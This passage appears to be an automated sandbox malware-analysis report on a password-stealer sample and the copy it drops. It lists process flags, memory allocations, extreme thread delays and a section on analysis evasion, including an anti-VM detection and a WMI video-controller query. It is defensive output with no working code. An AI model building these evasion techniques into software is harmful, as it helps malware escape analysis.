Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 4E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 62E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 72E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 7520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 8520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 19C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 33C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 66B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 76B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 66B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 1270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Memory allocated: 1810000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7246	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 483	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8291	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 543	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Window / User API: threadDelayed 4439	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Window / User API: threadDelayed 5368	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe TID: 2968	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe TID: 8184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe TID: 2112	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
